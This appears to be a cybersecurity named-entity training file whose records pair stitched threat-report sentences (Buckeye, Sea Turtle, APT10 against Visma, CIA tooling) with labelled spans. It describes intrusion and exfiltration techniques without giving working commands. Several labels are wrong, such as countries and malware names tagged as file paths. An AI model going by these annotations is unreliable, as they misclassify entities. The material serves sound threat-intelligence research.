{"text": "An example SMS message is shown in Figure 1 . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . Finally , it will be run using “ post.php ” as argument . But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": {"THREAT_ACTOR: Attackers": [[46, 55]], "ORGANIZATION: oil": [[240, 243]], "ORGANIZATION: gas": [[246, 249]], "ORGANIZATION: petrochemical companies": [[256, 279]], "ORGANIZATION: executives": [[309, 319]], "FILEPATH: post.php": [[470, 478]], "VULNERABILITY: CVE-2023 - 34362": [[569, 585]], "THREAT_ACTOR: Cl0p": [[643, 647]]}, "info": {"id": "cyberner_stix_train_002195", "source": "cyberner_stix_train"}}
{"text": "Android remains a prime target for malicious attacks . This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology . The suspicious sample detected by Augur is actually a new 32-bit ShadowPad launcher . The malware then checks the command execution functionality using a command that vary across the samples .", "spans": {"SYSTEM: Android": [[0, 7]], "ORGANIZATION: education": [[150, 159]], "ORGANIZATION: energy": [[162, 168]], "ORGANIZATION: technology": [[173, 183]], "TOOL: Augur": [[220, 225]], "MALWARE: ShadowPad": [[251, 260]], "MALWARE: The malware": [[272, 283]]}, "info": {"id": "cyberner_stix_train_002196", "source": "cyberner_stix_train"}}
{"text": "SeaDuke is made interesting by the fact that it is written in Python and designed to be cross-platform so that it works on both Windows and Linux .", "spans": {"MALWARE: SeaDuke": [[0, 7]], "TOOL: Python": [[62, 68]], "SYSTEM: Windows": [[128, 135]], "SYSTEM: Linux": [[140, 145]]}, "info": {"id": "cyberner_stix_train_002197", "source": "cyberner_stix_train"}}
{"text": "In this scenario , one or more persons – likely including at least one CNIIHM employee , based on the moniker discussed above – would have had to conduct extensive , high-risk malware development and intrusion activity from CNIIHM ’s address space without CNIIHM ’s knowledge and approval over multiple years .", "spans": {"ORGANIZATION: CNIIHM": [[71, 77], [224, 230], [256, 262]]}, "info": {"id": "cyberner_stix_train_002198", "source": "cyberner_stix_train"}}
{"text": "The second method uses intents , broadcasts , and receivers to execute HenBox code . In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye 's long held public assessment that the Russian government sponsors APT28 .", "spans": {"THREAT_ACTOR: APT41": [[100, 105]], "ORGANIZATION: Department of Homeland Security": [[361, 392]], "ORGANIZATION: DHS": [[395, 398]], "ORGANIZATION: FBI": [[439, 442]], "ORGANIZATION: FireEye": [[489, 496]], "ORGANIZATION: Russian government": [[537, 555]], "THREAT_ACTOR: APT28": [[565, 570]]}, "info": {"id": "cyberner_stix_train_002199", "source": "cyberner_stix_train"}}
{"text": "After publishing our initial series of blogposts back in 2016 , Kaspersky has continued to track the ScarCruft threat actor . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools . However , Buckeye had already been using some of these leaked tools at least a year beforehand . The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong . Beginning in March 2016 , Buckeye began using a variant of DoublePulsar (Backdoor.Doublepulsar) , a backdoor that was subsequently released by the Shadow Brokers in 2017 . However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware . During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) . One hour later , Bemstour was used against an educational institution in Belgium . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . DoublePulsar is then used to inject a secondary payload , which runs in memory only . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . Development of Bemstour has continued into 2019 . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the ACT the Windows SMB Server handles certain requests . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . In the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) . It is noteworthy that the attackers never used the FuzzBunch framework in its attacks . FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 . There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak . However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled . this RTF exploits again the CVE-2017-1882 on eqnedt32.exe . And the dropper execute the iassvcs.exe to make a side loading and make the persistence . This IP is very interesting because it connects with tele.zyns.com and old infrastructures used by chinese APT or DDOS Chinese team against the ancient soviet republics . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash . According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking . Today , this malware is still actively being used against the Philippines . Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 . Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware . Xagent” is the original filename Xagent.exe whereas seems to be the version of the worm . Xagent – A variant of JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms . Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang – a cyberespionage campaign directed at diplomatic organizations in Europe . We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group – a backdoor we named Okrum . Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group – BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 . Ke3chang behind the attacks seemed to have a particular interest in Slovakia , where a big portion of the discovered malware samples was detected; Croatia , the Czech Republic and other countries were also affected . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . The story continued in late 2016 , when we discovered a new , previously unknown backdoor that we named Okrum . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . In addition to file-based protection , customers of the DeepSight has received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation . North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies’ trade secrets . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor . Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region . Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group . The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script . Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file . Once the script runs , it passes the decoded script from the image file to the Windows command line in a variable $x , which uses cmd.exe to execute the obfuscated script and run it via PowerShell . The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names . In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims . The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations . The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors . In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed . The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . Captured legitimate user credentials when users interacted with these actor - controlled servers . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure . On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors’ tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar . During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate . One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks . At this time , we do not believe that the attackers found a new ASA exploit . Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network . As an example , DNS records indicate that a targeted domain resolved to an actor-controlled MitM server . In another case , the attackers were able to compromise NetNod , a non-profit , independent internet infrastructure organization based in Sweden . Using this access , the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net . This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax . We assess with high confidence that Sea Turtle was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor . Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . These actors perform DNS hijacking through the use of actor-controlled name servers . Sea Turtle have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . These actors use Let's Encrypts , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials . These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . we believe that the Sea Turtle campaign continues to be highly successful for several reasons . Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains . The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials . Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed . If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources . The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware . Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook . Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed , disarmed and published . These redactions include ten of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States . The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks . The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads . The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS . CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop . These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . CIA's malware includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk LOCs Brutal Kangaroo and to keep its malware infestations going . Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa . The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below . By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable . Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border LOC — including France , Italy and Switzerland . A number of the CIA's electronic attack methods are designed for physical proximity . The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer . The attacker then infects and exfiltrates data to removable media . As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . For example , the CIA attack system Fine Dining , provides 24 decoy applications for CIA spies to use . For example , Comodo was defeated by CIA malware placing itself in the Window's Recycle Bin . CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure . The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation . This information is used by the CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . HIVE is a multi-platform CIA malware suite and its associated control software . A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn’t be surprising they are the work of the group described in Kaspersky’s Winnti – More than just a game” . The OSB functions as the interface between CIA operational staff and the relevant technical support staff . A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 . The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware . On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 . APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated to a Dropbox account using the cURL for Windows command-line tool . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . On top of the breadth , volume , and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) . Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , ” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . The backdoor was deployed using the Notepad++ updater and sideloading malicious DLL , as noted in APT10’s targeting of Japanese corporations in July 2018 . That attack was attributed to perpetrators Kaspersky called the Winnti Group . APT10 is a threat actor that has been active since at least 2009 . APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft . We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date . In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co. Ltd. and Laoying Baichen Instruments Equipment Co. Ltd . Based on the technical data uncovered , and in light of recent disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors . Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 . Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . The December APT10 indictment noted that the group’s malicious activities breached at least 45 companies and managed service providers in 12 countries , including Brazil , Canada , Finland , France , Germany , India , Japan , Sweden , Switzerland , the United Arab Emirates , the United Kingdom , and the United States . In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company . In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/Exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS ( JukeBox ) and Linux ( DanceFloor ) . . During this operation (dubbed ‘Cloud Hopper” because of the group’s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes as well as some familiar old tools . Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property . This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China’s civilian human intelligence agency . The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe . Recorded Future has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks . Recorded Future’s Insikt Group has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 . This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . On August 30 , 2018 , APT10 deployed their first modified version of Trochilus that had its C2 communications encrypted using Salsa20 and RC4 ciphers instead of the more common RC4-encrypted Trochilus variant seen in the wild . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . APT10 also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company . They also identified broadly similar TTPs being used in the attack against a U.S. law firm specializing in intellectual property law . Rapid7’s investigation revealed the law firm was first targeted in late 2017 , followed by the apparel company a few months later , and finally , the Visma attack in August 2018 . In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 . APT10 actors gained initial access to the Visma network around August 17 , 2018 . While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials . After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE . This means that APT10 actors had two separate access points into the Visma network . This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack . Other examples of malicious infrastructure registered with internet.bs include domains for APT28’s VPNFilter malware campaign and the registration of the cyber-berkut . org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach . The attacker gained access to the victim’s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe.” The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known good binaries that had DLL search order path issues . Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 . The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . For Exfiltration of stolen data , APT10 used WinRAR and renamed rar.exe” to r.exe” to create archives , upload them with curl.exe” (renamed to c.exe”) , and again , use the cloud storage provider Dropbox . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma . Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host . Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 . We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations . APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S. Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security . This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains .", "spans": {"ORGANIZATION: Kaspersky": [[64, 73], [22019, 22028], [24975, 24984]], "THREAT_ACTOR: ScarCruft": [[101, 110]], "VULNERABILITY: CVE-2010-3962": [[140, 153]], "VULNERABILITY: CVE-2014-1776": [[196, 209]], "THREAT_ACTOR: Shadow Brokers": [[274, 288], [1005, 1019], [3674, 3688]], "THREAT_ACTOR: Equation": [[350, 358]], "MALWARE: DoublePulsar backdoor": [[514, 535], [1530, 1551], [1886, 1907]], "MALWARE: FuzzBunch": [[542, 551], [3564, 3573]], "MALWARE: framework": [[552, 561]], "MALWARE: EternalBlue": [[572, 583]], "MALWARE: EternalSynergy": [[586, 600]], "MALWARE: EternalRomance": [[607, 621]], "MALWARE: exploit": [[622, 629]], "MALWARE: tools": [[630, 635], [8306, 8311]], "THREAT_ACTOR: Buckeye": [[648, 655], [785, 792], [884, 891], [1071, 1078], [3742, 3749], [3915, 3922], [5119, 5126], [7830, 7837]], "MALWARE: leaked tools": [[693, 705]], "MALWARE: Equation Group tools": [[761, 781]], "MALWARE: Bemstour exploit tool": [[1110, 1131]], "MALWARE: DoublePulsar": [[1140, 1152]], "VULNERABILITY: exploit": [[1302, 1309], [1689, 1696], [3043, 3050], [3171, 3178], [3235, 3242], [13486, 13493]], "MALWARE: Buckeye": [[1350, 1357]], "MALWARE: malware": [[1358, 1365], [6396, 6403], [17011, 17018], [20641, 20648]], "FILEPATH: Bemstour": [[1402, 1410], [1468, 1476], [1680, 1688], [1910, 1918], [2034, 2042], [2121, 2129], [2184, 2192], [2372, 2380]], "FILEPATH: Belgium": [[1458, 1465]], "FILEPATH: DoublePulsar": [[1554, 1566]], "MALWARE: Bemstour": [[1852, 1860]], "FILEPATH: Pirpi": [[2223, 2228]], "FILEPATH: backdoor": [[2229, 2237]], "MALWARE: different backdoor": [[2297, 2315]], "MALWARE: Trojan": [[2316, 2322]], "ORGANIZATION: Symantec": [[2389, 2397], [2664, 2672], [2767, 2775], [3867, 3875]], "VULNERABILITY: zero-day": [[2471, 2479], [2619, 2627], [3435, 3443], [4397, 4405]], "ORGANIZATION: Microsoft": [[2509, 2518], [4929, 4938], [19108, 19117], [21879, 21888], [34533, 34542]], "FILEPATH: Filensfer": [[2521, 2530], [2806, 2815], [4287, 4296]], "VULNERABILITY: (CVE-2019-0703)": [[2673, 2688]], "SYSTEM: Windows": [[2715, 2722], [5822, 5829], [10384, 10391], [19118, 19125], [23425, 23432], [27401, 27408], [29866, 29873], [30127, 30134]], "FILEPATH: Buckeye malware": [[2967, 2982]], "MALWARE: (Backdoor.Pirpi)": [[2983, 2999]], "VULNERABILITY: CVE-2017-0143": [[3002, 3015]], "FILEPATH: tools—EternalRomance": [[3051, 3071]], "FILEPATH: EternalSynergy—that": [[3076, 3095]], "FILEPATH: EternalRomance": [[3186, 3200]], "FILEPATH: EternalSynergy": [[3214, 3228]], "FILEPATH: CVE-2017-0143": [[3247, 3260]], "MALWARE: Buckeye exploit tool": [[3378, 3398]], "THREAT_ACTOR: attackers": [[3502, 3511], [9933, 9942], [11592, 11601], [12983, 12992], [13460, 13469], [13792, 13801], [14050, 14059], [14520, 14529], [15406, 15415], [15471, 15480], [26683, 26692], [30323, 30332], [30778, 30787], [33651, 33660]], "MALWARE: FuzzBunch framework": [[3527, 3546]], "THREAT_ACTOR: Equation Group": [[3759, 3773], [21044, 21058]], "TOOL: RTF": [[3943, 3946]], "VULNERABILITY: 